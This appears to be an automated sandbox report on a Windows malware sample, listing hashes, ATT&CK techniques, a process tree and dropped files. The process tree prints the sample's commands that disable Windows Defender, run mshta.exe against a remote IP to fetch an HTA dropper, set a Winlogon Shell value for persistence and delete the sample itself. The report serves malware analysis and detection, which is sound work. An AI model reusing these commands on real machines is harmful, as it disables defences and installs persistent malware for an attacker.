73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91

Analysis

max time kernel
150s
max time network
119s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
30-12-2023 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

197d8655ed6900478b74c479fe2a1fd9.exe
Size

2.2MB
MD5

197d8655ed6900478b74c479fe2a1fd9
SHA1

0225e85f1d912e719fec67d379f19a28625ceaa6
SHA256

73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91
SHA512

6479e6ed498cdf81ba8e4e726a5f2faa7cc8d7cb2489bbd2bc1db2f277fde6d1ab5a5720bafa7116a5a083c76c1ca415840dd820b83d8d93f992a3b04765781f
SSDEEP

49152:7sgqSiGCeSWxUs9cY+fN11ivBzV+3ZYqjuPOBW0wtuVXIPcOU7m6MICD5:7nqFveZb9LKYvT+3SiiO8Lc5OU7a5

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=SCFGBRBT&2=i-s&3=63&4=7601&5=6&6=1&7=99600&8=1033

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\bilfij.exe"	bilfij.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1908	mshta.exe
5	1908	mshta.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Deletes itself 1 IoCs

pid	Process
2632	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2692	bilfij.exe

Loads dropped DLL 2 IoCs

pid	Process
2216	197d8655ed6900478b74c479fe2a1fd9.exe
2216	197d8655ed6900478b74c479fe2a1fd9.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2800	sc.exe
2712	sc.exe
2412	sc.exe
2160	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	bilfij.exe
Token: SeShutdownPrivilege	2692	bilfij.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe
2692	bilfij.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2692	bilfij.exe
2692	bilfij.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 2800	2216	197d8655ed6900478b74c479fe2a1fd9.exe	28
PID 2216 wrote to memory of 2800	2216	197d8655ed6900478b74c479fe2a1fd9.exe	28
PID 2216 wrote to memory of 2800	2216	197d8655ed6900478b74c479fe2a1fd9.exe	28
PID 2216 wrote to memory of 2800	2216	197d8655ed6900478b74c479fe2a1fd9.exe	28
PID 2216 wrote to memory of 2712	2216	197d8655ed6900478b74c479fe2a1fd9.exe	29
PID 2216 wrote to memory of 2712	2216	197d8655ed6900478b74c479fe2a1fd9.exe	29
PID 2216 wrote to memory of 2712	2216	197d8655ed6900478b74c479fe2a1fd9.exe	29
PID 2216 wrote to memory of 2712	2216	197d8655ed6900478b74c479fe2a1fd9.exe	29
PID 2216 wrote to memory of 2692	2216	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2216 wrote to memory of 2692	2216	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2216 wrote to memory of 2692	2216	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2216 wrote to memory of 2692	2216	197d8655ed6900478b74c479fe2a1fd9.exe	32
PID 2216 wrote to memory of 2632	2216	197d8655ed6900478b74c479fe2a1fd9.exe	34
PID 2216 wrote to memory of 2632	2216	197d8655ed6900478b74c479fe2a1fd9.exe	34
PID 2216 wrote to memory of 2632	2216	197d8655ed6900478b74c479fe2a1fd9.exe	34
PID 2216 wrote to memory of 2632	2216	197d8655ed6900478b74c479fe2a1fd9.exe	34
PID 2692 wrote to memory of 2160	2692	bilfij.exe	39
PID 2692 wrote to memory of 2160	2692	bilfij.exe	39
PID 2692 wrote to memory of 2160	2692	bilfij.exe	39
PID 2692 wrote to memory of 2160	2692	bilfij.exe	39
PID 2692 wrote to memory of 2412	2692	bilfij.exe	35
PID 2692 wrote to memory of 2412	2692	bilfij.exe	35
PID 2692 wrote to memory of 2412	2692	bilfij.exe	35
PID 2692 wrote to memory of 2412	2692	bilfij.exe	35
PID 2692 wrote to memory of 1908	2692	bilfij.exe	36
PID 2692 wrote to memory of 1908	2692	bilfij.exe	36
PID 2692 wrote to memory of 1908	2692	bilfij.exe	36
PID 2692 wrote to memory of 1908	2692	bilfij.exe	36

C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe
"C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\SysWOW64\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  PID:2800
- C:\Windows\SysWOW64\sc.exe
  sc config WinDefend start= disabled
  2⤵
  - Launches sc.exe
  PID:2712
- C:\Users\Admin\AppData\Roaming\bilfij.exe
  C:\Users\Admin\AppData\Roaming\bilfij.exe
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2412
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=SCFGBRBT&2=i-s&3=63&4=7601&5=6&6=1&7=99600&8=1033"
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    PID:1908
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\197D86~1.EXE" >> NUL
  2⤵
  - Deletes itself
  PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\bilfij.exe

Filesize
611KB

MD5
d3083d9b8ac2945391f688af47b08c29

SHA1
6f899e0c5c4214b2609a7438499ef6fb3b57a94a

SHA256
f5eda3cd9097bd289c39a6d59e0ca22579067da70aaf47d3106b07765a6e0889

SHA512
06b5396cae36cbc75160f46597f668e9d5c91d1d9e9896848fb64da4a0c67bc4a3487241bc1ffe9425551163f0792e2da642dc6587c4c808b03306c7bb4aad0f

Download Submit
C:\Users\Admin\AppData\Roaming\bilfij.exe

Filesize
98KB

MD5
d19350bb32d1c5be83dc645f595af080

SHA1
6068c2fa3fd51c7b4543944de2d909c06cb6a32e

SHA256
36779753b1bf3a673fb61ed5088705cf4a9479a917ecca59608465f8b422e216

SHA512
cb14557f1457043d94e348ac9cddba738160e5fec6419d88fa75ba3a71c340a683dd067a29cd9d70b224b529315bff9aa3254b5075e2eaae80c857ad0ffadd74

Download Submit
C:\Users\Admin\AppData\Roaming\bilfij.exe

Filesize
92KB

MD5
94ce672fdf2fa7152761c07b3b40fc48

SHA1
518b77a5da108fec2e4df90d64540d27cddb95fb

SHA256
003651ade1e5c2992dc903fc5e4d9c4bbacd0b685fcdf664bf79e6c7fa07ecb1

SHA512
de5bbb8e7df9ac0bc549d359e323180a02795b24401eb56b575a155c374b4a14fb1a30be5b94f4f61b78b0d2dba77a15b15cd31ea7788017f77480e22c6f5301

Download Submit
\Users\Admin\AppData\Roaming\bilfij.exe

Filesize
832KB

MD5
d9d43b54cdf01ee8e957b3d27fc1e811

SHA1
9d42857dc253a8e762e89bddf91612a7e0a9a119

SHA256
54041ce3c50778cf6313a9dae3befeb5336702a120f6651d6d7e9bc905ce50f3

SHA512
648af1efa3687f44195f2a5c5d5ec84244e1d94aa7dcfac0346fe7d39529be13496b11c29de3bbb6e5c0aa7737a9dd710aa19a0d35c3c73d768d5842959e839c

Download Submit
\Users\Admin\AppData\Roaming\bilfij.exe

Filesize
129KB

MD5
2cc0d81bda6e99791304654a052970bb

SHA1
76eb57d7284b028c45591e74828d8a2ac00029a7

SHA256
ac5af21e12f618d02843c62b840175c510bb916a8048cd60fdbaa29de3fe8060

SHA512
f1d9d08d7b502b0fefb3f67ef7c0af7e335fbffe32650163c0a56860712df286ec01b176d2ac657aee1a1f8cbcacda811a5c145a009e7b39d90528e2c954f895

Download Submit
memory/2216-62-0x0000000003C20000-0x0000000003C21000-memory.dmp

Filesize
4KB

Download
memory/2216-15-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/2216-2-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2216-3-0x0000000000880000-0x0000000000881000-memory.dmp

Filesize
4KB

Download
memory/2216-4-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/2216-59-0x0000000003C10000-0x0000000003C11000-memory.dmp

Filesize
4KB

Download
memory/2216-22-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/2216-21-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/2216-20-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/2216-19-0x00000000023A0000-0x00000000023A1000-memory.dmp

Filesize
4KB

Download
memory/2216-18-0x0000000002230000-0x0000000002231000-memory.dmp

Filesize
4KB

Download
memory/2216-17-0x0000000002350000-0x0000000002351000-memory.dmp

Filesize
4KB

Download
memory/2216-16-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/2216-58-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

Filesize
4KB

Download
memory/2216-14-0x00000000009A0000-0x00000000009A1000-memory.dmp

Filesize
4KB

Download
memory/2216-13-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/2216-12-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/2216-9-0x0000000000870000-0x0000000000871000-memory.dmp

Filesize
4KB

Download
memory/2216-8-0x00000000034E0000-0x00000000034E1000-memory.dmp

Filesize
4KB

Download
memory/2216-7-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/2216-6-0x0000000000850000-0x0000000000851000-memory.dmp

Filesize
4KB

Download
memory/2216-5-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/2216-11-0x0000000000980000-0x0000000000981000-memory.dmp

Filesize
4KB

Download
memory/2216-10-0x00000000034D0000-0x00000000034D2000-memory.dmp

Filesize
8KB

Download
memory/2216-24-0x0000000003520000-0x0000000003521000-memory.dmp

Filesize
4KB

Download
memory/2216-57-0x0000000003BF0000-0x0000000003BF1000-memory.dmp

Filesize
4KB

Download
memory/2216-25-0x00000000034C0000-0x00000000034C2000-memory.dmp

Filesize
8KB

Download
memory/2216-42-0x0000000003700000-0x0000000003701000-memory.dmp

Filesize
4KB

Download
memory/2216-63-0x0000000003C40000-0x0000000003C41000-memory.dmp

Filesize
4KB

Download
memory/2216-0-0x0000000000400000-0x0000000000842000-memory.dmp

Filesize
4.3MB

Download
memory/2216-61-0x0000000003C30000-0x0000000003C31000-memory.dmp

Filesize
4KB

Download
memory/2216-60-0x0000000003C00000-0x0000000003C01000-memory.dmp

Filesize
4KB

Download
memory/2216-23-0x0000000000990000-0x0000000000991000-memory.dmp

Filesize
4KB

Download
memory/2216-1-0x00000000008B0000-0x0000000000910000-memory.dmp

Filesize
384KB

Download
memory/2216-26-0x0000000000910000-0x0000000000911000-memory.dmp

Filesize
4KB

Download
memory/2216-56-0x0000000003BC0000-0x0000000003BC1000-memory.dmp

Filesize
4KB

Download
memory/2216-55-0x0000000003BD0000-0x0000000003BD1000-memory.dmp

Filesize
4KB

Download
memory/2216-54-0x0000000003BA0000-0x0000000003BA1000-memory.dmp

Filesize
4KB

Download
memory/2216-53-0x0000000003BB0000-0x0000000003BB1000-memory.dmp

Filesize
4KB

Download
memory/2216-52-0x0000000003790000-0x0000000003791000-memory.dmp

Filesize
4KB

Download
memory/2216-51-0x0000000003770000-0x0000000003771000-memory.dmp

Filesize
4KB

Download
memory/2216-50-0x0000000003780000-0x0000000003781000-memory.dmp

Filesize
4KB

Download
memory/2216-49-0x0000000003750000-0x0000000003751000-memory.dmp

Filesize
4KB

Download
memory/2216-48-0x0000000003760000-0x0000000003761000-memory.dmp

Filesize
4KB

Download
memory/2216-47-0x0000000003730000-0x0000000003731000-memory.dmp

Filesize
4KB

Download
memory/2216-46-0x0000000003740000-0x0000000003741000-memory.dmp

Filesize
4KB

Download
memory/2216-45-0x0000000003710000-0x0000000003711000-memory.dmp

Filesize
4KB

Download
memory/2216-44-0x0000000003720000-0x0000000003721000-memory.dmp

Filesize
4KB

Download
memory/2216-43-0x00000000036F0000-0x00000000036F1000-memory.dmp

Filesize
4KB

Download
memory/2216-41-0x0000000003590000-0x0000000003591000-memory.dmp

Filesize
4KB

Download
memory/2216-40-0x00000000035A0000-0x00000000035A1000-memory.dmp

Filesize
4KB

Download
memory/2216-39-0x0000000003570000-0x0000000003571000-memory.dmp

Filesize
4KB

Download
memory/2216-38-0x0000000003580000-0x0000000003581000-memory.dmp

Filesize
4KB

Download
memory/2216-37-0x0000000003550000-0x0000000003551000-memory.dmp

Filesize
4KB

Download
memory/2216-36-0x0000000003560000-0x0000000003561000-memory.dmp

Filesize
4KB

Download
memory/2216-35-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/2216-34-0x0000000003540000-0x0000000003541000-memory.dmp

Filesize
4KB

Download
memory/2216-33-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/2216-32-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/2216-31-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/2216-30-0x00000000034F0000-0x00000000034F1000-memory.dmp

Filesize
4KB

Download
memory/2216-29-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/2216-28-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/2216-27-0x0000000003530000-0x0000000003531000-memory.dmp

Filesize
4KB

Download
memory/2216-80-0x0000000000400000-0x0000000000842000-memory.dmp

Filesize
4.3MB

Download